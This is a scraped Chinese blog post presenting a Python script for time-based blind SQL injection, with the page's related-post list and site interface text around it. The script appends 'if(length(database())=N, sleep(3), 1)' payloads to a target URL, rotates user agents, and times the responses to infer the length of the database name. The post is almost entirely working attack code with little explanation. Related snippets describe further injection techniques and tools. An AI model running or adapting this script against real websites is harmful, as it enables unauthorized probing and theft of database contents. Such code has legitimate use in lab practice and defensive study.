SQL注入代码实践(盲注-获取数据库名长度【数值型】)

已于 2022-08-20 18:48:38 修改
阅读量1k 收藏 1
点赞数 1
分类专栏: 网络安全 文章标签: sql python pycharm 安全
于 2022-08-20 18:41:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/DMHY123/article/details/126442967
版权 
# -*- coding: utf-8 -*-
"""
@Time : 2022/4/4 16:19
@Auth : zhangxiang
@File :GetLength_Inject.py
@IDE :PyCharm
@Motto:ABC(Always Be Coding)

"""
#获取数据库名长度
from urllib import request
from urllib import parse
import re
import time
import sys
import random
from ua_info import ua_list

class GetLength_Inject(object):
    def __init__(self):
        pass
    def Str_Start(self,StrList,url):
        for num in range(1,32):

            judgeStr = "%20and%20if((length((select%20database()))=changeNum),sleep(3),1)%23"
            submitStr = "&submit=0x5375626D6974%23"
            pattern1 = r"changeNum"
            replace1 = str(num)
            FisWord = re.sub(pattern1,replace1,judgeStr)
            full_url = url + FisWord + submitStr
            print(full_url)
            headers = {'User-Agent':random.choice(ua_list)}
            startTime = time.time()
            req = request.Request(url=full_url,headers=headers)
            res = request.urlopen(req)
            endTime = time.time()
            allTime = endTime - startTime
            # print(allTime)

            if(allTime>3):
                print("*"*200)
                #StrList.append(num)
                print("得到盲注结果,数据库的长度为:"+str(num))
                print("注入的payload:"+full_url)
                print("使用的时间:"+str(allTime))
                print("*"*200)
                # print(StrList)
                # if (StrList[num] == None):
                #     return 0
                return  num
            else:
                pass
    def Num_Start(self,StrList,url):
        for num in range(1,32):

            judgeStr = "%20and%20if((length((select%20database()))=changeNum),sleep(3),1)"
            submitStr = "&submit=0x5375626D6974"
            pattern1 = r"changeNum"
            replace1 = str(num)
            FisWord = re.sub(pattern1,replace1,judgeStr)
            full_url = url + FisWord + submitStr
            # print(full_url)
            headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0'}
            startTime = time.time()
            req = request.Request(url=full_url,headers=headers)
            res = request.urlopen(req)
            endTime = time.time()
            allTime = endTime - startTime
            # print(allTime)

            if(allTime>3):
                print("*"*200)
                # StrList.append(num)
                print("得到盲注结果,数据库的长度为:"+str(num))
                print("注入的payload:"+full_url)
                print("使用的时间:"+str(allTime))
                print("*"*200)
                # print(StrList)
                # if (StrList[num] == None):
                #     return 0
                return num
            else:
                pass

保证四个小时充足睡眠
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入---
qq_41592307的博客
09-04 511
1、的原理 屏蔽了报错信息,攻击者无法使用报错信息来进行注入判断。 2、的类 1. Boolean:无论输入什么只会显示真与假 2. 时间:页面没有任何的显示,通过时间的延迟来判断是否存在注入 3、Boolean 3.1、什么是Boolean? 是无论输入什么,结果只返回真和假两种结果。 3.2、Boolean的判断方式 判断数据库名的长度:length(database())>=x ...
sqli-labs Less-5~6(sqli-labs闯关指南 5—6)--
m0_54899775的博客
12-15 1184
sqli-labs Less-5~6(sqli-labs闯关指南 5—6)-- sqli-labs Less 5 sqli-labs Less 6
sql-labs
Macro2的博客
08-19 274
less-1 基于报错单引号注入 判断整注入还是字符注入 http://127.0.0.1/sqli-labs-master/Less-1/?id=1 正常 http://127.0.0.1/sqli-labs-master/Less-1/?id=1' 异常 http://127.0.0.1/sqli-labs-master/Less-1/?id=1 and 1=1 正常 http://127.0.0.1/sqli-labs-master/...
SQL注入
cike_y
08-15 1564
关于SQL注入的详细解析,有什么疑问欢迎大家提出
SQL注入-布尔
热门推荐
wangyuxiang946的博客
06-27 1万+
页面没有显示位 , 没有报错信息 , 只有成功和不成功两种情况时 , 可以使用布尔 本次以 SQLi LABS 第9关为案例进行讲解 布尔常用的两个函数(我觉得) length('abc') -- 判断字符串长度 substr('abc',1,1) -- 截取字符串,从第1个字符开始截取,截取1个 第一步,判断注入 先正常输入一个?id=1 , 正常登录 you are in 我们再给一个不存在的id , ?id=-1 , id肯定不能为负数,数据库查不到...
SQL注入之基于布尔的详解
09-10
首先说明的注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入一般分为布尔和基于时间的。这篇文章主要讲解的是基于布尔的。下面来一起看看吧。
SQL注入技巧-暴库详细技巧及实例
10-11
个人通过拜读各位前辈们的博文以及大量的ctf题目训练,结合挖洞经验整理的几点sql常用的技巧,结合具体的sql指令加深理解,针对常用的防护技术,总结了几种通用的绕过技巧
数据库SQLserver java课程 设计-SQL Server代码类资源
06-13
SQL和java做的课程设计—学生信息管理系统。含源代码,含数据表。
sql注入 自学笔记 报错注入 二阶注入 布尔时间 基于sqli-labs
02-19
sql注入 自学笔记 报错注入 二阶注入 布尔时间 基于sqli-labs
超级SQL注入工具-web-sql
10-28
支持出现在HTTP协议任意位置的SQL注入,支持各种类SQL注入 支持Bool、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库
Sqli-labs11-15 (附获取数据库长度和名字的脚本)
Recar的博客
12-26 3836
第十一题 报错这里写代码片一个登陆界面这是登陆成功 用户名输入单引号报错猜测是 select * from users where username='$name' and password='$password' 闭合select * from users where username=' 'or 1=1 # ' and password='$password'要将后面的and释掉 不然
数据库注入学习笔记6----(布尔和时间注入)
qq_41759633的博客
08-08 525
引:一般用于服务器没有给出sql执行后的回显,分为两类 布尔: 布尔很明显Ture跟Fales,也就是说它只会根据你的注入信息返回Ture跟Fales,也就没有了之前的报错信息。 时间: 界面返回值只有一种,true无论输入任何值 返回情况都会按正常的来处理。加入特定的时间函数,通过查看WEB页面返回的时间差来判断注入语句是否正确 涉及的函数: Length(): 函数 返回字符...
sql注入基于布尔/时间的详解
Sp4rkW的博客
10-07 9434
本来想自己总结写一篇的,发现有篇写的很好,转载mark一个~ 原文链接:http://www.jb51.net/article/93445.htm 基于布尔的 Web的页面的仅仅会返回True和False。那么布尔就是进行SQL注入之后然后根据页面返回的True或者是False来得到数据库中的相关信息。 由于本次是布尔注入,手无法完整地进行脱裤。所以在本节需要编写大量...
sql注入(纯原创)
qq_56438857的博客
08-02 328
SQL注入过程中,SQL语句执行后,选择的数据不能回显到前端页面,此时需要利用一些方法进行判断或者尝试,这个过程称之为。在中,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响应时间不同)。若有查询结果,就证明后面这东西是对的。这里后面是数据库名字的第一个字符的ascii码值。这里区别于前面的是,这里用的是query(),而之前用的execute()。这里之所以用limit限制,是因为源码要求查询结果只能有一条。,之前一直靠的错误回显来窃取关键信息的。...
SQL注入代码实践-获取数据库长度【字符】)
DMHY123的博客
08-20 402
代码SQL注入代码实践-获取数据库长度【字符】)
7个常见的SQL慢查询问题及其解决方法
csdn1561168266的博客
05-20 897
大家好,得益于摩尔定律,计算机性能已大幅提升,加上数据库的进步以及微服务所倡导的各种反模式设计,因此现在编写复杂SQL查询的机会越来越少。业界已经开始提倡不要进行专门的SQL优化,因为节省下来的资源并不足以抵消员工的工资成本。本文将介绍7个常见的SQL慢查询语句,并解释如何优化它们的性能。
PostgreSQL自带的命令行工具25- ecpg
lee_vincent1的博客
05-23 513
ecpg是 PostgreSQL 实现的嵌入式 SQL 编译器,它将带有嵌入式 SQL 的 C 代码转化为纯 C 代码,并生成可以直接调用 PostgreSQL API 的程序。通过ecpg,开发者可以在 C 程序中直接写 SQL 语句,提高了数据库操作的可读性和开发效率。ecpg是 PostgreSQL 提供的一个强大工具,允许开发者在 C 程序中嵌入 SQL 语句,从而简化了数据库访问逻辑,并提供类安全和标准化的数据库接口。
国产操作系统上使用SQLynx连接数据库 _ 统信 _ 麒麟 _ 中科方德
最新发布
鹏大圣运维
05-23 676
Hello,大家好啊!今天我们将探讨如何在国产操作系统上使用SQLynx。这是一款功能强大的数据库管理工具,可以帮助用户高效地管理和操作数据库。本文将详细介绍SQLynx的安装、配置和使用方法。欢迎大家分享转发,点个关和在看吧!
GBase 8s 如何查看回滚的事务 和对应的SQL
weixin_55963561的博客
05-20 244
经过上面的分析:长事务到达高水位之后,事务即将挂起,长事务回滚完之后,挂起的事务没断开,也没发起重连,导致gds和应用也连不上,onmode -z sid,让session重连。描述:gbase在线,在gbase服务器里面能正常访问gbase,但是用工具程序就访问不了,gbase服务是online状态,存储空间也是够的,这是gbase日志。onstat -u|grep "686cb9e8" 获取到 sessionid;方法2: 通过 onstat -x|grep "A-R";
SQL注入SQL的区别
04-07
SQL注入是指攻击者通过在用户输入的数据中插入恶意的SQL代码,从而绕过应用程序的输入验证,进而执行非授权的数据库操作。攻击者可以通过SQL注入获取、修改或删除数据库中的数据,甚至执行任意的系统命令。SQL注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值